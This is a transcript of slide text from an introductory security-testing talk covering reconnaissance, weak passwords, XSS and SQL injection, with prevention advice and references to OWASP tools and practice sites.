security testing operation vijay
TRANSCRIPT
Security TestingOperation Vijay
What is hacking?
Hackers
Types of Hackers● Ethical Hackers
● Crackers
DefineSecurity Testing is a type of testing that
intends to uncover vulnerabilities of the system and determine that its data and resources are protected from possible intruders.
Types of Security Testing● Infrastructure Security Testing
● Application Security Testing
When?
Security Testing Vocabulary● Reconnaissance/ Information
gathering
● Vulnerability
● Exploit
Reconnaissance
Demo
Reconnaissance
Mission
P@ssw04d
Default / Weak Passwords
Password Vaults
Demo
Cross Site ScriptingClient side injection attack
Types:
Reflected XSS
Stored XSS
DOM based XSS
Reflected XSS
Demo
Reflected XSS
Mission
Stored XSS
Demo
Stored XSS
Mission
XSS PreventionDon’t use user input as-is
Encoding
X-XSS-Protection Response Header
HttpOnly flag Response Header
Popular XSS Attacks
SQL InjectionAttack where SQL commands are
injected in order to affect the execution of predefined SQL commands
SQL Injection
Demo
SQL Injection PreventionDon’t use user input directly
Use prepared statements
Use stored procedures
Use frameworks
ZAP
Referenceshttps://www.owasp.org
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
https://www.google.co.in/about/appsecurity/tools/
https://xkcd.com/327/
http://www.dvwa.co.uk/
https://www.amazon.in/Web-Application-Hackers-Handbook-Exploiting-ebook/dp/B005LVQA9S
https://google-gruyere.appspot.com
https://www.youtube.com/watch?v=lc7scxvKQOohttps://www.imperva.com/docs/wp_consumer_password_worst_practices.pdf
http://softwaretestingfundamentals.com/security-testing/
Thank you
Dhaval Doshi (@dhavaldoshi)Lavanya Mohan (@LavanyaMohan210)
Shirish Padalkar (@_Garbage_)